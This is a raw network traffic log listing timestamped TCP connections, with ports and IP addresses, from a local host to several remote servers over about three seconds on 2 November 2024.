Nov 2, 2024 17:56:42.131913900 CET	49824	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.131927967 CET	443	49824	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.136198997 CET	443	49820	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.136269093 CET	443	49820	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.136322021 CET	49820	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.136461973 CET	49820	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.136482954 CET	443	49820	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.136493921 CET	49820	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.136499882 CET	443	49820	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.142131090 CET	443	49819	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.142190933 CET	443	49819	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.142288923 CET	49819	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.148062944 CET	49826	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.148083925 CET	443	49826	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.148314953 CET	49826	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.149475098 CET	49819	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.149494886 CET	443	49819	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.149507999 CET	49819	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.149513006 CET	443	49819	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.149660110 CET	49826	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.149681091 CET	443	49826	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.155004025 CET	49827	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.155040026 CET	443	49827	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.155093908 CET	49827	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.166491985 CET	49827	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.166515112 CET	443	49827	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.310651064 CET	49818	443	192.168.2.7	94.245.104.56
Nov 2, 2024 17:56:42.310688019 CET	443	49818	94.245.104.56	192.168.2.7
Nov 2, 2024 17:56:42.454155922 CET	443	49818	94.245.104.56	192.168.2.7
Nov 2, 2024 17:56:42.457113028 CET	49818	443	192.168.2.7	94.245.104.56
Nov 2, 2024 17:56:42.862848997 CET	443	49823	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.875608921 CET	443	49825	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.886900902 CET	443	49826	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.896732092 CET	443	49824	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.939373016 CET	443	49827	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.985851049 CET	49823	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.985869884 CET	49827	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.985872030 CET	49826	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.990809917 CET	49827	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.990818977 CET	443	49827	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.992165089 CET	49827	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.992172956 CET	443	49827	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.995086908 CET	49824	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.995114088 CET	443	49824	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.996918917 CET	49824	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.996926069 CET	443	49824	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.998850107 CET	49823	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.998862982 CET	443	49823	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.999238968 CET	49825	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.999263048 CET	443	49825	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:42.999701023 CET	49823	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:42.999706030 CET	443	49823	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.004842997 CET	49825	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.004852057 CET	443	49825	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.006994963 CET	49826	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.007013083 CET	443	49826	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.007846117 CET	49826	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.007853985 CET	443	49826	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.017739058 CET	49818	443	192.168.2.7	94.245.104.56
Nov 2, 2024 17:56:43.017755032 CET	443	49818	94.245.104.56	192.168.2.7
Nov 2, 2024 17:56:43.054457903 CET	49832	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:43.054514885 CET	443	49832	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:43.054666042 CET	49832	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:43.055727005 CET	49832	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:43.055747032 CET	443	49832	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:43.124324083 CET	443	49827	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.124488115 CET	443	49827	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.127218962 CET	443	49824	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.127258062 CET	49827	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.127291918 CET	443	49824	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.127367020 CET	49824	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.129941940 CET	443	49823	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.130007029 CET	443	49823	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.130058050 CET	49823	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.132817030 CET	443	49825	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.132937908 CET	443	49825	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.132996082 CET	49825	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.134238958 CET	443	49826	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.134299040 CET	443	49826	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.134349108 CET	49826	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.136560917 CET	49824	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.136585951 CET	443	49824	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.136622906 CET	49824	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.136630058 CET	443	49824	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.136643887 CET	49827	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.136657000 CET	443	49827	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.136668921 CET	49827	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.136673927 CET	443	49827	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.139108896 CET	49825	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.139112949 CET	443	49825	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.139122009 CET	49825	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.139123917 CET	443	49825	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.140292883 CET	49826	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.140311956 CET	443	49826	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.140347004 CET	49826	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.140352964 CET	443	49826	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.143693924 CET	49823	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.143693924 CET	49823	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.143711090 CET	443	49823	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.143719912 CET	443	49823	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.154592991 CET	49833	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.154620886 CET	443	49833	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.154685020 CET	49833	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.161461115 CET	49833	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.161482096 CET	443	49833	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.168952942 CET	49834	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.168998003 CET	443	49834	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.169054985 CET	49834	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.169234991 CET	49834	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.169246912 CET	443	49834	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.182770014 CET	49835	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.182786942 CET	443	49835	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.182853937 CET	49835	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.183300018 CET	49836	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.183336973 CET	443	49836	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.183388948 CET	49836	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.183958054 CET	80	49787	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:43.184014082 CET	49787	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:43.194763899 CET	49837	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.194799900 CET	443	49837	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.194855928 CET	49837	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.195635080 CET	49835	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.195647955 CET	443	49835	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.196031094 CET	49836	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.196048021 CET	443	49836	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.201903105 CET	49837	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.201920033 CET	443	49837	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.900367022 CET	443	49833	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.901132107 CET	49833	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.901155949 CET	443	49833	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.901660919 CET	49833	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.901668072 CET	443	49833	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.934453964 CET	443	49836	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.934907913 CET	49836	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.934952021 CET	443	49836	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.935465097 CET	49836	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.935475111 CET	443	49836	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.947257996 CET	443	49834	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.947710991 CET	49834	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.947750092 CET	443	49834	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.948203087 CET	49834	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.948210001 CET	443	49834	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.960216045 CET	443	49835	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.960711956 CET	49835	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.960745096 CET	443	49835	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.961148977 CET	49835	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.961155891 CET	443	49835	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.973639965 CET	443	49837	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.974132061 CET	49837	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.974159956 CET	443	49837	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:43.974560976 CET	49837	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:43.974565983 CET	443	49837	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.032259941 CET	443	49833	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.032330036 CET	443	49833	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.032489061 CET	49833	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.034853935 CET	49833	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.034868002 CET	443	49833	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.034936905 CET	49833	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.034943104 CET	443	49833	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.039736986 CET	49838	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.039793015 CET	443	49838	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.039908886 CET	49838	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.040096045 CET	49838	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.040112019 CET	443	49838	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.064193010 CET	443	49836	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.064269066 CET	443	49836	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.064347982 CET	49836	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.067156076 CET	49836	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.067203999 CET	443	49836	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.067224979 CET	49836	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.067233086 CET	443	49836	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.070504904 CET	49839	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.070554972 CET	443	49839	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.070647955 CET	49839	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.070837021 CET	49839	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.070858002 CET	443	49839	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.087886095 CET	443	49834	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.087929010 CET	443	49834	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.087975025 CET	49834	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.087985039 CET	443	49834	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.088061094 CET	49834	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.088344097 CET	49834	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.088362932 CET	443	49834	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.088380098 CET	49834	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.088387012 CET	443	49834	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.093123913 CET	49840	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.093168020 CET	443	49840	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.093226910 CET	49840	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.093806028 CET	49840	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.093826056 CET	443	49840	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.097032070 CET	443	49835	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.097126961 CET	443	49835	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.097202063 CET	49835	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.097392082 CET	49835	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.097392082 CET	49835	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.097407103 CET	443	49835	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.097415924 CET	443	49835	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.100303888 CET	49841	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.100343943 CET	443	49841	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.100487947 CET	49841	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.100640059 CET	49841	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.100655079 CET	443	49841	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.108299971 CET	443	49837	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.108329058 CET	443	49837	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.108374119 CET	443	49837	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.108422041 CET	49837	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.108551025 CET	49837	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.108563900 CET	443	49837	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.108572960 CET	49837	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.108577967 CET	443	49837	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.115796089 CET	49842	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.115828991 CET	443	49842	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.115902901 CET	49842	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.116030931 CET	49842	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:44.116045952 CET	443	49842	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.135545969 CET	443	49832	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:44.135672092 CET	49832	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:44.195974112 CET	49832	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:44.195997953 CET	443	49832	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:44.196377039 CET	443	49832	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:44.197674990 CET	49832	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:44.197691917 CET	49832	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:44.197704077 CET	443	49832	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:44.280239105 CET	49849	443	192.168.2.7	18.244.18.27
Nov 2, 2024 17:56:44.280249119 CET	443	49849	18.244.18.27	192.168.2.7
Nov 2, 2024 17:56:44.280303955 CET	49849	443	192.168.2.7	18.244.18.27
Nov 2, 2024 17:56:44.281066895 CET	49849	443	192.168.2.7	18.244.18.27
Nov 2, 2024 17:56:44.281078100 CET	443	49849	18.244.18.27	192.168.2.7
Nov 2, 2024 17:56:44.563407898 CET	443	49832	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:44.618509054 CET	49832	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:44.618530035 CET	443	49832	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:44.629129887 CET	49832	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:44.629183054 CET	49832	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:44.629364967 CET	443	49832	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:44.629400015 CET	443	49832	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:44.629483938 CET	49832	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:44.894113064 CET	49856	443	192.168.2.7	172.217.16.129
Nov 2, 2024 17:56:44.894165039 CET	443	49856	172.217.16.129	192.168.2.7
Nov 2, 2024 17:56:44.894218922 CET	49856	443	192.168.2.7	172.217.16.129
Nov 2, 2024 17:56:44.894505024 CET	49856	443	192.168.2.7	172.217.16.129
Nov 2, 2024 17:56:44.894520044 CET	443	49856	172.217.16.129	192.168.2.7
Nov 2, 2024 17:56:44.904793978 CET	49857	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:44.904844046 CET	443	49857	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:44.904968023 CET	49857	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:44.905843973 CET	49857	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:44.905860901 CET	443	49857	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:44.972673893 CET	443	49839	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.973582029 CET	443	49842	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.974124908 CET	443	49840	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.974698067 CET	443	49838	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:44.974740028 CET	443	49841	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.017605066 CET	49839	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.018696070 CET	49842	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.018702030 CET	49838	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.089977980 CET	49841	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.090010881 CET	443	49841	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.090697050 CET	49841	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.090708017 CET	443	49841	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.091116905 CET	49838	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.091131926 CET	443	49838	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.091597080 CET	49838	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.091602087 CET	443	49838	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.091890097 CET	49839	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.091912985 CET	443	49839	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.092369080 CET	49839	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.092375040 CET	443	49839	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.092880011 CET	49842	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.092886925 CET	443	49842	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.093364954 CET	49842	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.093369961 CET	443	49842	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.094019890 CET	49840	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.094033003 CET	443	49840	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.094469070 CET	49840	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.094474077 CET	443	49840	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.221657991 CET	443	49839	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.221745014 CET	443	49839	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.222105026 CET	49839	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.223694086 CET	443	49842	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.223701000 CET	443	49840	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.223706961 CET	443	49838	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.223732948 CET	443	49840	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.223764896 CET	443	49842	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.223772049 CET	443	49838	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.223788977 CET	443	49840	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.223797083 CET	49840	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.223818064 CET	49842	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.223839998 CET	49840	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.223846912 CET	49838	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.224143028 CET	443	49841	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.224220991 CET	443	49841	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.225167036 CET	49841	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.257317066 CET	443	49849	18.244.18.27	192.168.2.7
Nov 2, 2024 17:56:45.292287111 CET	49849	443	192.168.2.7	18.244.18.27
Nov 2, 2024 17:56:45.292303085 CET	443	49849	18.244.18.27	192.168.2.7
Nov 2, 2024 17:56:45.293432951 CET	443	49849	18.244.18.27	192.168.2.7
Nov 2, 2024 17:56:45.293509007 CET	49849	443	192.168.2.7	18.244.18.27
Nov 2, 2024 17:56:45.554013968 CET	49849	443	192.168.2.7	18.244.18.27
Nov 2, 2024 17:56:45.554275036 CET	443	49849	18.244.18.27	192.168.2.7
Nov 2, 2024 17:56:45.580499887 CET	49858	443	192.168.2.7	162.159.61.3
Nov 2, 2024 17:56:45.580538034 CET	443	49858	162.159.61.3	192.168.2.7
Nov 2, 2024 17:56:45.580877066 CET	49858	443	192.168.2.7	162.159.61.3
Nov 2, 2024 17:56:45.581192017 CET	49859	443	192.168.2.7	172.64.41.3
Nov 2, 2024 17:56:45.581228018 CET	443	49859	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:45.581281900 CET	49859	443	192.168.2.7	172.64.41.3
Nov 2, 2024 17:56:45.583143950 CET	49858	443	192.168.2.7	162.159.61.3
Nov 2, 2024 17:56:45.583162069 CET	443	49858	162.159.61.3	192.168.2.7
Nov 2, 2024 17:56:45.583352089 CET	49859	443	192.168.2.7	172.64.41.3
Nov 2, 2024 17:56:45.583367109 CET	443	49859	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:45.607737064 CET	49860	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:45.607795954 CET	443	49860	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:45.607908010 CET	49860	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:45.609042883 CET	49839	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.609071970 CET	443	49839	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.609086037 CET	49839	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.609092951 CET	443	49839	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.611071110 CET	49849	443	192.168.2.7	18.244.18.27
Nov 2, 2024 17:56:45.611082077 CET	443	49849	18.244.18.27	192.168.2.7
Nov 2, 2024 17:56:45.613101006 CET	49838	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.613133907 CET	443	49838	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.613147974 CET	49838	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.613154888 CET	443	49838	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.613776922 CET	49841	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.613796949 CET	443	49841	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.614984989 CET	49842	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.614984989 CET	49840	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.614999056 CET	443	49842	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.615009069 CET	443	49840	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.615016937 CET	49842	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.615016937 CET	49840	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.615024090 CET	443	49842	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.615031958 CET	443	49840	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.618458033 CET	49860	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:45.618484974 CET	443	49860	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:45.624387026 CET	49861	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.624398947 CET	443	49861	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.624469995 CET	49861	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.625967026 CET	49862	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.625999928 CET	443	49862	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:45.626076937 CET	49862	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:45.627388000 CET	49863	443	192.168.2.7	13.107.246.45
